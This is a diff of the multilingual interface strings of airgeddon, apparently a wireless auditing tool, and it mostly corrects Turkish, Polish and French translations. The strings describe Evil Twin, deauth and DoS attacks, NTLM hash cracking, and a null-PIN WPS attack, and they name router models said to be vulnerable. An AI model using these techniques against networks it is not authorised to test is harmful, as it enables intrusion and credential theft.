διαδικασία υπολογισμού PIN δεν είναι καθ' αυτοὺ offline. Απαιτείται ένα ολοκληρωμένο \"probe\" response από το σημείο πρόσβασης για να ληφθούν τα απαραίτητα δεδομένα. ${green_color}Θέλετε να συνεχίσετε; ${normal_color}${visual_choice}" arr["ITALIAN",504]="${blue_color}Questo processo di calcolo del PIN non è puramente offline. É richiesta una risposta completa \"probe\" dal punto di accesso obiettivo per ottenere i dati necessari. ${green_color}Vuoi continuare? ${normal_color}${visual_choice}" - arr["POLISH",504]=" ${blue_color}Ten proces obliczania kodu PIN nie jest wyłącznie offline. Wymagana jest pełna odpowiedź \"probe\" z docelowego punktu dostępu, aby uzyskać niezbędne dane. ${green_color}Czy chcesz kontynuować? ${normal_color}${visual_choice}" + arr["POLISH",504]="${blue_color}Ten proces obliczania kodu PIN nie jest wyłącznie offline. Wymagana jest pełna odpowiedź \"probe\" z docelowego punktu dostępu, aby uzyskać niezbędne dane. ${green_color}Czy chcesz kontynuować? ${normal_color}${visual_choice}" arr["GERMAN",504]="${blue_color}Dieser PIN-Berechnungsprozess ist nicht rein offline. Eine vollständige \"probe\"-Antwort vom Zielzugriffspunkt wird benötigt, um die erforderlichen Daten zu erhalten. ${green_color} Möchten Sie fortfahren? ${normal_color}${visual_choice}" - arr["TURKISH",504]="${pending_of_translation} ${blue_color}Bu PIN hesaplama işlemi tamamen çevrimdışı değildir. Gerekli bir veri elde etmek için hedef erişim noktasından eksiksiz bir \"probe\" yanıtı gerekir. ${green_color}Devam etmek istiyor musunuz? ${normal_color}${visual_choice}" + arr["TURKISH",504]="${blue_color}Bu PIN hesaplama işlemi tamamen çevrimdışı değildir. Gerekli bir veri elde etmek için hedef erişim noktasından eksiksiz bir \"probe\" yanıtı gerekir. ${green_color}Devam etmek istiyor musunuz? ${normal_color}${visual_choice}" arr["ENGLISH",505]="Do you want to enable \"DoS pursuit mode\"? ${blue_color}This will launch again the attack if target AP change its channel countering \"channel hopping\" ${normal_color}${visual_choice}" arr["SPANISH",505]="¿Deseas activar el \"modo persecución DoS\"? ${blue_color}Esto relanzará el ataque si el AP objetivo cambia de canal contrarrestando el \"channel hopping\" ${normal_color}${visual_choice}" @@ -7075,8 +7079,8 @@ function language_strings() { arr["GREEK",518]="Αφού καταγράψετε τα certificates σε μια Enterprise επίθεση δικτύου, θυμηθείτε ότι μπορείτε να προσπαθήσετε να αποκρυπτογραφήσετε τα NTLM hashes χρησιμοποιώντας το \"Μενού offline αποκρυπτογράφησης WPA/WPA2\"" arr["ITALIAN",518]="Dopo aver catturato le credenziali in un attacco contro una rete Enterprise, ricorda che puoi provare a decifrare gli hash NTLM utilizzando il \"Menù per decifrare WPA/WPA2 offline\"" arr["POLISH",518]="Po przechwyceniu danych dostępowych w ataku na sieć Enterprise pamiętaj, że możesz spróbować złamać hash NTLM za pomocą \"Menu deszyfrowania WPA/WPA2 offline\"" - arr["GERMAN",518]="Erinneren Sie sich dran, dass nach dem Erfassen von Credentials bei einem Enterprise-Netzwerkangriff Sie NTLM-Hashes mit dem \"Offline WPA/WPA2-Entschlüsselungsmenü\" entschlüsseln können." - arr["TURKISH",518]="Enterprise ağ saldırısında kimlik bilgilerini aldıktan sonra, \"Çevrimdışı WPA/WPA2 decrypt menüsü\" kullanarak NTLM karmalarını çözmeyi deneyebilirsiniz." + arr["GERMAN",518]="Erinneren Sie sich dran, dass nach dem Erfassen von Credentials bei einem Enterprise-Netzwerkangriff Sie NTLM-Hashes mit dem \"Offline WPA/WPA2-Entschlüsselungsmenü\" entschlüsseln können" + arr["TURKISH",518]="Enterprise ağ saldırısında kimlik bilgilerini aldıktan sonra, \"Çevrimdışı WPA/WPA2 decrypt menüsü\" kullanarak NTLM karmalarını çözmeyi deneyebilirsiniz" arr["ENGLISH",519]="11. Turkish" arr["SPANISH",519]="11. Turco" @@ -7086,8 +7090,8 @@ function language_strings() { arr["RUSSIAN",519]="11. Турецкий" arr["GREEK",519]="11. Τουρκικά" arr["ITALIAN",519]="11. Turco" - arr["POLISH",519]=" 11. Turecki" - arr["GERMAN",519]=" 11. Türkisch" + arr["POLISH",519]="11. Turecki" + arr["GERMAN",519]="11. Türkisch" arr["TURKISH",519]="11. Türkçe" arr["ENGLISH",520]="Enterprise Evil Twin deauth" @@ -7124,7 +7128,7 @@ function language_strings() { arr["ITALIAN",522]="Evil Twin Enterprise modalità smooth" arr["POLISH",522]="Enterprise Evil Twin w trybie smooth" arr["GERMAN",522]="Smooth-Modus Enterprise Evil Twin" - arr["TURKISH",522]="${pending_of_translation} Smooth mod Enterprise Şeytani İkiz" + arr["TURKISH",522]="Smooth mod Enterprise Şeytani İkiz" arr["ENGLISH",523]="Noisy mode Enterprise Evil Twin" arr["SPANISH",523]="Evil Twin Enterprise modo noisy" @@ -7136,7 +7140,7 @@ function language_strings() { arr["ITALIAN",523]="Evil Twin Enterprise modalità noisy" arr["POLISH",523]="Enterprise Evil Twin w trybie noisy" arr["GERMAN",523]="Noisy-Modus Enterprise Evil Twin" - arr["TURKISH",523]="${pending_of_translation} Noisy mod Enterprise Şeytani İkiz" + arr["TURKISH",523]="Noisy mod Enterprise Şeytani İkiz" arr["ENGLISH",524]="Enterprise Evil Twin attack has been started. Press [Enter] key on this window to stop it" arr["SPANISH",524]="El ataque Evil Twin Enterprise ha comenzado. Pulse la tecla [Enter] en esta ventana para pararlo" @@ -7316,7 +7320,7 @@ function language_strings() { arr["ITALIAN",538]="Si cercherá di decifrare la password dell'utente con il programma asleap ${normal_color}${enterprise_username}${blue_color} i cui challange e reponse sono: ${normal_color}${enterprise_captured_challenges_responses[${enterprise_username}]}" arr["POLISH",538]="Spróbujemy rozszyfrować za pomocą narzędzia asleap hasło użytkownika ${normal_color}${enterprise_username}${blue_color}, którego challenge i odpowiedzią są: ${normal_color}${enterprise_captured_challenges_responses[${enterprise_username}]}" arr["GERMAN",538]="Wir werden versuchen, mit dem asleap-Tool das Passwort des Benutzers ${normal_color}${enterprise_username}${blue_color} zu entschlüsseln, dessen Challenge und Antwort lauten: ${normal_color}${enterprise_captured_challenges_responses[${enterprise_username}]}" - arr["TURKISH",538]="${pending_of_translation} Asleap aracıyla, sorunu ve yanıtı olan kullanıcının ${normal_color}${enterprise_username}${blue_color} şifresini çözmeyi deneyeceğiz: ${normal_color}${enterprise_captured_challenges_responses[${enterprise_username}]}" + arr["TURKISH",538]="Asleap aracıyla, sorunu ve yanıtı olan kullanıcının ${normal_color}${enterprise_username}${blue_color} şifresini çözmeyi deneyeceğiz: ${normal_color}${enterprise_captured_challenges_responses[${enterprise_username}]}" arr["ENGLISH",539]="Asleap trophy file generated successfully at [${normal_color}${path_to_asleap_trophy}${blue_color}]" arr["SPANISH",539]="Fichero de trofeo asleap generado con éxito en [${normal_color}${path_to_asleap_trophy}${blue_color}]" @@ -7448,7 +7452,7 @@ function language_strings() { arr["ITALIAN",549]="6. (asleap) Attacco di dizionario challenge/response" arr["POLISH",549]="6. (asleap) Atak słownikowey challenge/odpowiedź" arr["GERMAN",549]="6. (asleap) Wörterbuch-Angriff: Herausforderung/Antwort" - arr["TURKISH",549]="${pending_of_translation} 6. (asleap) Challenge/response dictionary saldırısı" + arr["TURKISH",549]="6. (asleap) Challenge/response sözlük saldırısı" arr["ENGLISH",550]="3. (hashcat) Dictionary attack against capture file" arr["SPANISH",550]="3. (hashcat) Ataque de diccionario sobre fichero de captura" @@ -7556,7 +7560,7 @@ function language_strings() { arr["ITALIAN",558]="${blue_color}La colorazione basica sará disattivata. ${green_color}Vuoi continuare? ${normal_color}${visual_choice}" arr["POLISH",558]="${blue_color}Podstawowe kolorowanie zostanie wyłączone. ${green_color}Czy chcesz kontynuować? ${normal_color}${visual_choice}" arr["GERMAN",558]="${blue_color}Die Grundfärbung wird deaktiviert. ${green_color}Möchten Sie fortfahren? ${normal_color}${visual_choice}" - arr["TURKISH",558]="${pending_of_translation} ${blue_color}Temel renklendirme devre dışı bırakılacak. ${green_color}Devam etmek istiyor musunuz? ${normal_color}${visual_choice}" + arr["TURKISH",558]="${blue_color}Temel renklendirme devre dışı bırakılacak. ${green_color}Devam etmek istiyor musunuz? ${normal_color}${visual_choice}" arr["ENGLISH",559]="${blue_color}Basic colorization is going to be enabled. ${green_color}Do you want to continue? ${normal_color}${visual_choice}" arr["SPANISH",559]="${blue_color}Se va a activar la colorización básica. ${green_color}¿Deseas continuar? ${normal_color}${visual_choice}" @@ -7827,7 +7831,7 @@ function language_strings() { arr["FRENCH",581]="Vous avez lancé airgeddon avec les contrôles silencieux activés. Désactiver cette option pour voir quel est le problème" arr["CATALAN",581]="Vas llançar airgeddon amb les revisions silencioses activades. Deshabilita aquesta opció per veure quin és el problema" arr["PORTUGUESE",581]="Você executou o airgeddon com a verificação silenciosa ativa. Desative essa opção para ver qual é o problema" - arr["RUSSIAN",581]="Вы запустили airgeddon с включенными тихими проверками. Отключите этот параметр, чтобы узнать, в чем проблема." + arr["RUSSIAN",581]="Вы запустили airgeddon с включенными тихими проверками. Отключите этот параметр, чтобы узнать, в чем проблема" arr["GREEK",581]="Ξεκινήσατε το airgeddon με ενεργοποιημένα τα silent checks. Απενεργοποιήστε αυτήν την επιλογή για να δείτε ποιό είναι ακρίβώς το πρόβλημα" arr["ITALIAN",581]="Hai lanciato airgeddon con i controlli silenziosi attivati. Disabilita questa opzione per vedere qual'è il problema" arr["POLISH",581]="Uruchomiłeś airgeddon z włączonym cichym sprawdzaniem. Wyłącz tę opcję, aby zobaczyć w czym jest problem" @@ -7940,7 +7944,7 @@ function language_strings() { arr["ITALIAN",590]="Puoi modificare manualmente il file ${rc_file} che si trova nella stessa directory dello script per modificarne le opzioni. Puoi anche lanciare \"flags\" sulla linea di comando. Maggiori informazioni su: ${urlgithub_wiki}/Options" arr["POLISH",590]="Możesz ręcznie zmodyfikować plik ${rc_file} znajdujący się w tym samym katalogu co skrypt, aby zmienić jego opcje. Możesz także wpisać \"flags\" w linii poleceń. Więcej informacji: ${urlgithub_wiki}/Options" arr["GERMAN",590]="Sie können die Datei ${rc_file}, die sich im selben Verzeichnis wie das Skript befindet, manuell ändern, um die Optionen zu ändern. Sie können auch \"flags\" in die Befehlszeile werfen. Weitere Informationen dazu: ${urlgithub_wiki}/Options" - arr["TURKISH",590]="${pending_of_translation} Seçeneklerini değiştirmek için komut dosyasıyla aynı dizinde bulunan ${rc_file} dosyasını manuel olarak değiştirebilirsiniz. Komut satırında \"flags\" da atabilirsiniz. Hakkında daha fazla bilgi: ${urlgithub_wiki}/Options" + arr["TURKISH",590]="Seçenekleri değiştirmek için script dosyasıyla aynı dizinde bulunan ${rc_file} dosyasını manuel olarak değiştirebilirsiniz. Komut satırında \"flags\" de ekleyebilirsiniz. Hakkında daha fazla bilgi: ${urlgithub_wiki}/Options" arr["ENGLISH",591]="Changing these options ${rc_file} is modified as well and the changes are permanent" arr["SPANISH",591]="Cambiando estas opciones modificas el fichero ${rc_file} y los cambios son permanentes" @@ -8072,11 +8076,11 @@ function language_strings() { arr["ITALIAN",601]="Il file selezionato non ha un hash valido in formato enterprise per hashcat" arr["POLISH",601]="Wybrany plik ma nieprawidłowy format hash korporacyjnego dla hashcat" arr["GERMAN",601]="Die ausgewählte Datei hat kein gültiges Enterprise-Hashformat für hashcat" - arr["TURKISH",601]="${pending_of_translation} Seçilen dosyanın geçersiz bir hashcat kuruluş karma biçimi var" + arr["TURKISH",601]="Seçilen dosyanın geçersiz bir hashcat kuruluş karma biçimi var" arr["ENGLISH",602]="Selected file has a valid hashcat enterprise hashes format" arr["SPANISH",602]="El fichero seleccionado tiene un formato válido de hashes enterprise para hashcat" - arr["FRENCH",602]="Le fichier sélectionné a un format de hashes d'enterprise valide pour hashcat." + arr["FRENCH",602]="Le fichier sélectionné a un format de hashes d'enterprise valide pour hashcat" arr["CATALAN",602]="El fitxer seleccionat té un format vàlid de hashes enterprise per hashcat" arr["PORTUGUESE",602]="O arquivo selecionado possui um formato de hashes enterprise válidas para o hashcat" arr["RUSSIAN",602]="Выбранный файл имеет правильный формат хеша enterprise для hashcat" @@ -8148,7 +8152,7 @@ function language_strings() { arr["ENGLISH",608]="Selected file has a valid john the ripper enterprise hashes format" arr["SPANISH",608]="El fichero seleccionado tiene un formato válido de hashes enterprise para john the ripper" - arr["FRENCH",608]="Le fichier sélectionné a un format de hashes d’entreprise valide pour john the ripper." + arr["FRENCH",608]="Le fichier sélectionné a un format de hashes d’entreprise valide pour john the ripper" arr["CATALAN",608]="El fitxer seleccionat té un format vàlid de hashes enterprise per john the ripper" arr["PORTUGUESE",608]="O arquivo selecionado possui um formato de hashes enterprise válidas para o john the ripper" arr["RUSSIAN",608]="Выбранный файл имеет правильный формат хеша enterprise для john the ripper" @@ -8216,7 +8220,7 @@ function language_strings() { arr["ITALIAN",613]="Attenzione. Controlla il file ${rc_file} o i flag della linea di comando. Il valore della variabile ${normal_color}${error_var_name}${yellow_color} non è valido. Verrà utilizzato il valore predefinito ${normal_color}${error_var_default_value}${yellow_color}" arr["POLISH",613]="Ostrzeżenie! Sprawdź plik ${rc_file} lub parametry linii poleceń. Niepoprawna wartość zmiennej ${normal_color}${error_var_name}${yellow_color}. Użyta zostanie wartość domyślna ${normal_color}${error_var_default_value}${yellow_color}" arr["GERMAN",613]="Achtung. Bitte überprüfen Sie ${rc_file}. Ungültiger Wert für die Variable ${normal_color}${error_var_name}${yellow_color}. ${normal_color}${error_var_default_value}${yellow_color} wird verwendet" - arr["TURKISH",613]="${pending_of_translation} Uyarı. Lütfen ${rc_file} dosyasını veya komut satırı bayraklarını kontrol edin. ${normal_color}${error_var_name}${yellow_color} değişkeninde geçersiz değer. ${normal_color}${error_var_default_value}${yellow_color} varsayılan değeri kullanılmak istiyor" + arr["TURKISH",613]="Uyarı. Lütfen ${rc_file} dosyasını veya komut satırı bayraklarını kontrol edin. ${normal_color}${error_var_name}${yellow_color} değişkeninde geçersiz değer. ${normal_color}${error_var_default_value}${yellow_color} varsayılan değeri kullanılacak" arr["ENGLISH",614]="Warning. Please check ${rc_file} file. Configuration variable ${normal_color}${error_var_name}${yellow_color} not found. The default value ${normal_color}${error_var_default_value}${yellow_color} will be used" arr["SPANISH",614]="Atención. Por favor revisa el fichero ${rc_file}. No se ha encontrado la variable ${normal_color}${error_var_name}${yellow_color}. El valor por defecto ${normal_color}${error_var_default_value}${yellow_color} será usado" @@ -8228,7 +8232,7 @@ function language_strings() { arr["ITALIAN",614]="Attenzione. Per favore controlla il file ${rc_file}. La variabile di configurazione ${normal_color}${error_var_name}${yellow_color} non è stata trovata. Verrà utilizzado il valore predefinito ${normal_color}${error_var_default_value}${yellow_color}" arr["POLISH",614]="Uwaga! Sprawdź plik ${rc_file}. Nie znaleziono zmiennej ${normal_color}${error_var_name}${yellow_color}. Użyta zostanie wartość domyślna ${normal_color}${error_var_default_value}${yellow_color}" arr["GERMAN",614]="Achtung. Bitte überprüfen Sie die ${rc_file}-Datei. Die Konfigurationsvariable ${normal_color}${error_var_name}${yellow_color} wurde nicht gefunden. ${normal_color}${error_var_default_value}${yellow_color} wird verwendet" - arr["TURKISH",614]="${pending_of_translation} Uyarı. Lütfen ${rc_file} dosyasını kontrol edin. Yapılandırma değişkeni ${normal_color}${error_var_name}${yellow_color} bulunamadı. ${normal_color}${error_var_default_value}${yellow_color} varsayılan değeri kullanılmak istiyor" + arr["TURKISH",614]="Uyarı! Lütfen ${rc_file} dosyasını kontrol edin. Yapılandırma değişkeni ${normal_color}${error_var_name}${yellow_color} bulunamadı. ${normal_color}${error_var_default_value}${yellow_color} varsayılan değeri kullanılmak istiyor" arr["ENGLISH",615]="There is an error in your configuration. Please check the ${rc_file} file. You have enabled the option to force the use of iptables instead of nftables (${normal_color}AIRGEDDON_FORCE_IPTABLES${red_color}) but your system doesn't have iptables installed. Disable this option or install iptables to fix the problem" arr["SPANISH",615]="Hay un error en tu configuración. Por favor revisa el fichero ${rc_file}. Has activado la opción para forzar el uso de iptables en lugar de nftables (${normal_color}AIRGEDDON_FORCE_IPTABLES${red_color}) pero tu sistema no tiene iptables instaladas. Deshabilita esta opción o instala iptables para solucionar el problema" @@ -8240,7 +8244,7 @@ function language_strings() { arr["ITALIAN",615]="C'è un errore nella tua configurazione. Per favore controlla il file ${rc_file}. Hai attivato l'opzione per forzare l'uso di iptables invece di nftables (${normal_color}AIRGEDDON_FORCE_IPTABLES${red_color}) ma il tuo sistema non ha iptables installato. Disabilita questa opzione o installa iptables per risolvere il problema" arr["POLISH",615]="Wystąpił błąd konfiguracji. Sprawdź plik ${rc_file}. Aktywowałeś opcję wymuszania użycia iptables zamiast nftables (${normal_color}AIRGEDDON_FORCE_IPTABLES${red_color}), ale twój system nie ma zainstalowanego iptables. Wyłącz tę opcję lub zainstaluj iptables, aby rozwiązać problem" arr["GERMAN",615]="Ein Fehler wurde in Ihren Einstellungen gefunden. Bitte überprüfen Sie die Datei ${rc_file}. Sie haben die Option aktiviert, um die Verwendung von iptables anstelle von nftables zu erzwingen (${normal_color}AIRGEDDON_FORCE_IPTABLES${red_color}), aber auf Ihrem System sind iptables nicht installiert. Deaktivieren Sie diese Option oder installieren Sie iptables, um das Problem zu lösen" - arr["TURKISH",615]="${pending_of_translation} Yapılandırmanızda bir hata var. Lütfen ${rc_file} dosyasını kontrol edin. Nftables (${normal_color}AIRGEDDON_FORCE_IPTABLES${red_color}) yerine iptables kullanımını zorlama seçeneğini etkinleştirdiniz, ancak sisteminizde iptables kurulu değil. Bu seçeneği devre dışı bırakın veya sorunu çözmek için iptables yükleyin" + arr["TURKISH",615]="Yapılandırmanızda bir hata var. Lütfen ${rc_file} dosyasını kontrol edin. Nftables (${normal_color}AIRGEDDON_FORCE_IPTABLES${red_color}) yerine iptables kullanımını zorlama seçeneğini etkinleştirdiniz, ancak sisteminizde iptables kurulu değil. Bu seçeneği devre dışı bırakın veya sorunu çözmek için iptables yükleyin" arr["ENGLISH",616]="10. Change windows handling method to tmux" arr["SPANISH",616]="10. Cambiar el método de manejo de ventanas a tmux" @@ -8252,7 +8256,7 @@ function language_strings() { arr["ITALIAN",616]="10. Cambiare il metodo di gestione delle finestre a tmux" arr["POLISH",616]="${pending_of_translation} 10. Zmień metodę zarządzania oknami na tmux" arr["GERMAN",616]="10. Ändern Sie die Fensterverwaltung zu tmux" - arr["TURKISH",616]="${pending_of_translation} 10. Pencere yönetimi yöntemini tmux olarak değiştirin" + arr["TURKISH",616]="10. Pencere yönetimi yöntemini tmux olarak değiştirin" arr["ENGLISH",617]="10. Change windows handling method to xterm" arr["SPANISH",617]="10. Cambiar el método de manejo de ventanas a xterm" @@ -8264,7 +8268,7 @@ function language_strings() { arr["ITALIAN",617]="10. Cambiare il metodo di gestione delle finestre a xterm" arr["POLISH",617]="${pending_of_translation} 10. Zmień metodę zarządzania oknami na xterm" arr["GERMAN",617]="10. Ändern Sie die Fensterverwaltung zu xterm" - arr["TURKISH",617]="${pending_of_translation} 10. Pencere yönetimi yöntemini xterm olarak değiştirin" + arr["TURKISH",617]="10. Pencere yönetimi yöntemini xterm olarak değiştirin" arr["ENGLISH",618]="Windows handling: ${pink_color}xterm${normal_color}" arr["SPANISH",618]="Manejo de ventanas: ${pink_color}xterm${normal_color}" @@ -8276,7 +8280,7 @@ function language_strings() { arr["ITALIAN",618]="Gestione delle finestre: ${pink_color}xterm${normal_color}" arr["POLISH",618]="${pending_of_translation} Zarządzanie oknami: ${pink_color}xterm${normal_color}" arr["GERMAN",618]="Fensterverwaltung: ${pink_color}xterm${normal_color}" - arr["TURKISH",618]="${pending_of_translation} Pencere yönetimi: ${pink_color}xterm${normal_color}" + arr["TURKISH",618]="Pencere yönetimi: ${pink_color}xterm${normal_color}" arr["ENGLISH",619]="Windows handling: ${pink_color}tmux${normal_color}" arr["SPANISH",619]="Manejo de ventanas: ${pink_color}tmux${normal_color}" @@ -8288,7 +8292,7 @@ function language_strings() { arr["ITALIAN",619]="Gestione delle finestre: ${pink_color}tmux${normal_color}" arr["POLISH",619]="${pending_of_translation} Zarządzanie oknami: ${pink_color}tmux${normal_color}" arr["GERMAN",619]="Fensterverwaltung: ${pink_color}tmux${normal_color}" - arr["TURKISH",619]="${pending_of_translation} Pencere yönetimi: ${pink_color}tmux${normal_color}" + arr["TURKISH",619]="Pencere yönetimi: ${pink_color}tmux${normal_color}" arr["ENGLISH",620]="The windows handling method has been modified in the configuration file. Restart the script in order to make the changes to take effect" arr["SPANISH",620]="Se ha modificado en el fichero de configuración el método de gestión de ventanas. Reinicia el script para que los cambios tengan efecto" @@ -8300,7 +8304,7 @@ function language_strings() { arr["ITALIAN",620]="Il metodo di gestione delle finestre è stato modificato nel file di configurazione. Riavviare lo script per rendere effettive le modifiche" arr["POLISH",620]="${pending_of_translation} Metoda zarządzania oknami została zmodyfikowana w pliku konfiguracyjnym. Uruchom ponownie skrypt, aby zmiany odniosły skutek" arr["GERMAN",620]="Die Fensterverwaltungsmethode wurde in der Konfigurationsdatei geändert. Starten Sie das Skript neu, damit die Änderungen wirksam werden" - arr["TURKISH",620]="${pending_of_translation} Pencere yönetim yöntemi, yapılandırma dosyasında değiştirildi. Değişikliklerin etkili olması için betiği yeniden başlatın" + arr["TURKISH",620]="Pencere yönetim yöntemi, yapılandırma dosyasında değiştirildi. Değişikliklerin etkili olması için betiği yeniden başlatın" arr["ENGLISH",621]="It's not possible to run airgeddon in the current tmux session. This session will be send to background and a new tmux session will be created for launching airgeddon" arr["SPANISH",621]="No es posible ejecutar airgeddon en la sesión tmux actual. Esta sesión será enviada a segundo plano y se creará una nueva sesión tmux donde airgeddon será lanzado" @@ -8312,7 +8316,7 @@ function language_strings() { arr["ITALIAN",621]="Non è possibile eseguire airgeddon nella sessione corrente di tmux. Questa sessione verrà mandata in background e verrà creata una nuova sessione tmux in cui verrà lanciato airgeddon" arr["POLISH",621]="${pending_of_translation} Nie można uruchomić airgeddon w bieżącej sesji tmux. Ta sesja zostanie wysłana do tła i zostanie utworzona nowa sesja tmux, w której zostanie uruchomiony airgeddon" arr["GERMAN",621]="Es ist nicht möglich, airgeddon in der aktuellen tmux-Sitzung auszuführen. Diese Sitzung wird in den Hintergrund gesendet und eine neue Sitzung wird erstellt, in der airgeddon gestartet wird" - arr["TURKISH",621]="${pending_of_translation} Mevcut tmux seansında airgeddon çalıştırmak mümkün değildir. Bu oturum arka plana gönderilecek ve airgeddon'un başlatılacağı yeni bir tmux oturumu oluşturulacak" + arr["TURKISH",621]="Mevcut tmux seansında airgeddon çalıştırmak mümkün değildir. Bu oturum arka plana gönderilecek ve airgeddon'un başlatılacağı yeni bir tmux oturumu oluşturulacak" arr["ENGLISH",622]="13. (reaver) Null PIN attack" arr["SPANISH",622]="13. (reaver) Ataque de PIN nulo" @@ -8324,7 +8328,7 @@ function language_strings() { arr["ITALIAN",622]="13. (reaver) Attacco del PIN nullo" arr["POLISH",622]="${pending_of_translation} 13. (reaver) Atak null PIN" arr["GERMAN",622]="13. (reaver) Null-PIN-Angriff" - arr["TURKISH",622]="${pending_of_translation} 13. (reaver) Boş PIN saldırısı" + arr["TURKISH",622]="13. (reaver) Null PIN saldırısı" arr["ENGLISH",623]="You have reaver installed (v${reaver_version}). You meet the version requirement to perform null PIN integrated reaver attack (minimum version v${minimum_reaver_nullpin_version}). Script can continue..." arr["SPANISH",623]="Tienes reaver instalado (v${reaver_version}). Cumples con el requisito de versión para realizar el ataque de PIN nulo integrado con reaver (versión minima v${minimum_reaver_nullpin_version}). El script puede continuar..." @@ -8336,7 +8340,7 @@ function language_strings() { arr["ITALIAN",623]="È stato installato reaver (v${reaver_version}). Soddisfi il requisito della versione per realizzare l'attacco del PIN nullo integrato in reaver (versione minima v${minimum_reaver_nullpin_version}). Lo script può continuare..." arr["POLISH",623]="${pending_of_translation} Masz zainstalowany reaver (v${reaver_version}). Spełnia on wymagania dotyczące wersji, aby wykonać atak null PIN (wersja minimalna v${minimum_reaver_nullpin_version}). Skrypt może kontynuować..." arr["GERMAN",623]="Reaver ist installiert (v${reaver_version}). Sie erfüllen die Versionsvoraussetzung, um den Null-PIN-Angriff auszuführen, der mit Reaver integriert ist (min Version v${minimum_reaver_nullpin_version}). Das Skript kann fortfahren..." - arr["TURKISH",623]="${pending_of_translation} Reaver sisteminizde kurulu (v${reaver_version}). Boş PIN entegre reaver saldırısını gerçekleştirmek için sürüm gereksinimini karşılıyorsunuz (minimum sürüm v${minimum_reaver_nullpin_version}). Script devam edebilir..." + arr["TURKISH",623]="Reaver sisteminizde kurulu (v${reaver_version}). Null PIN entegre edilmiş reaver saldırısını gerçekleştirmek için sürüm gereksinimini karşılıyorsunuz (minimum sürüm v${minimum_reaver_nullpin_version}). Script devam edebilir..." arr["ENGLISH",624]="You have reaver installed (v${reaver_version}), but not required version. To perform null PIN integrated reaver attack you must have at least version v${minimum_reaver_nullpin_version}" arr["SPANISH",624]="Tienes reaver instalado (v${reaver_version}), aunque no la versión requerida. Para realizar el ataque de PIN nulo integrado con reaver has de tener al menos la versión v${minimum_reaver_nullpin_version}" @@ -8348,7 +8352,7 @@ function language_strings() { arr["ITALIAN",624]="È stato installato reaver (v${reaver_version}), ma non la versione richiesta. Per realizzare l'attacco del PIN nullo integrato in reaver devi avere almeno la versione v${minimum_reaver_nullpin_version}" arr["POLISH",624]="${pending_of_translation} Masz zainstalowany reaver (v${reaver_version}), ale nie wymaganą wersję. Aby zrealizować atak null PIN zintegrowany z programem reaver musisz mieć co najmniej wersję v${minimum_reaver_nullpin_version}" arr["GERMAN",624]="Reaver ist installiert (v${reaver_version}), jedoch nicht die erforderliche Version. Um den Null-PIN-Angriff mit Reaver zu integrieren, müssen Sie mindestens die Version v${minimum_reaver_nullpin_version} haben" - arr["TURKISH",624]="${pending_of_translation} Reaver sisteminizde kurulu (v${reaver_version}), ancak sürüm uygun değil. Boş PIN entegre reaver saldırısını gerçekleştirmek için minimum sürüm olan ${minimum_reaver_nullpin_version} olmalıdır" + arr["TURKISH",624]="Reaver sisteminizde kurulu (v${reaver_version}), ancak sürüm uygun değil. Boş PIN entegre reaver saldırısını gerçekleştirmek için minimum sürüm olan ${minimum_reaver_nullpin_version} olmalıdır" arr["ENGLISH",625]="Null PIN attack is pretty fast and achieve the password almost instantly but only a few access points are vulnerable. Some of them are \"Huawei HG658C\", \"ZTE H218N\", \"ZTE H108N\" and \"ZTE H298N\"" arr["SPANISH",625]="El ataque de PIN nulo es muy rápido y consigue la contraseña instantáneamente pero solo unos pocos puntos de acceso son vulnerables. Algunos conocidos son \"Huawei HG658C\", \"ZTE H218N\", \"ZTE H108N\" y \"ZTE H298N\"" @@ -8360,7 +8364,7 @@ function language_strings() { arr["ITALIAN",625]="L'attacco del PIN nullo è molto veloce e ottiene la password all'istante, ma solo pochi punti di accesso sono vulnerabili. Alcuni conosciuti sono \"Huawei HG658C\", \"ZTE H218N\", \"ZTE H108N\" e \"ZTE H298N\"" arr["POLISH",625]="${pending_of_translation} Atak null kodu PIN jest bardzo szybki i natychmiast otrzymuje hasło, ale tylko kilka punktów dostępu jest podatnych na ataki. Niektóre są \"Huawei HG658C\", \"ZTE H218N\", \"ZTE H108N\" i \"ZTE H298N\"" arr["GERMAN",625]="Der Null-PIN-Angriff ist sehr schnell und erhält das Kennwort sofort, aber nur wenige access points sind anfällig. Einige sind \"Huawei HG658C\", \"ZTE H218N\", \"ZTE H108N\" und \"ZTE H298N\"" - arr["TURKISH",625]="${pending_of_translation} Boş PIN saldırısı çok hızlıdır ve şifreyi anında alır, ancak yalnızca birkaç erişim noktası korunmasızdır. Bazı \"Huawei HG658C\", \"ZTE H218N\", \"ZTE H108N\" ve \"ZTE H298N\"" + arr["TURKISH",625]="Null PIN saldırısı çok hızlıdır ve şifreyi anında alır, ancak yalnızca birkaç erişim noktası korunmasızdır. Bazı \"Huawei HG658C\", \"ZTE H218N\", \"ZTE H108N\" ve \"ZTE H298N\"" arr["ENGLISH",626]="Since airgeddon 9.20 version, tmux is supported and it can be used instead of xterm as windows handler. Script can be launched in a headless environment without a graphical X window system. It is recommended only for advanced users. Like any other option, it can be configured on the options menu, on the ${rc_file} options file or launched using AIRGEDDON_WINDOWS_HANDLING \"flag\" in the command line. More information about options customization at Wiki: ${urlgithub_wiki}/Options" arr["SPANISH",626]="A partir de la versión 9.20 de airgeddon, tmux está soportado y se puede utilizar en lugar de xterm como gestor de ventanas. Se puede lanzar el script en un entorno sin un sistema gráfico de ventanas X. Solo se recomienda hacerlo para usuarios avanzados. Como cualquier otra opción, se puede configurar desde el menú de opciones, configurarlo en el fichero de opciones ${rc_file} o lanzarlo usando el \"flag\" AIRGEDDON_WINDOWS_HANDLING en la línea de comandos. Más información acerca de la personalización de opciones en el Wiki: ${urlgithub_wiki}/Options" @@ -8372,7 +8376,343 @@ function language_strings() { arr["ITALIAN",626]="A partire dalla versione 9.20 di airgeddon, tmux è supportato e può essere usato al posto di xterm come gestore di finestre. È possibile avviare lo script in un ambiente senza un sistema grafico di finestre X. È consigliato solo per utenti esperti. Come qualsiasi altra opzione, può essere configurata dal menu delle opzioni, configurata nel file delle opzioni ${rc_file} o avviata utilizzando il \"flag\" AIRGEDDON_WINDOWS_HANDLING dalla linea di comando. Maggiori informazioni sulla personalizzazione delle opzioni nella Wiki: ${urlgithub_wiki}/Options" arr["POLISH",626]="${pending_of_translation} Począwszy od wersji 9.20 airgeddon, tmux jest obsługiwany i może być używany zamiast xterm jako menedżer okien. Skrypt można uruchomić w środowisku bez systemu graficznego okien X. Zalecany jest tylko dla zaawansowanych użytkowników. Jak każda inna opcja, można ją skonfigurować z menu opcji, skonfigurować w pliku opcji ${rc_file} lub uruchomić za pomocą \"flag\" AIRGEDDON_WINDOWS_HANDLING w wierszu 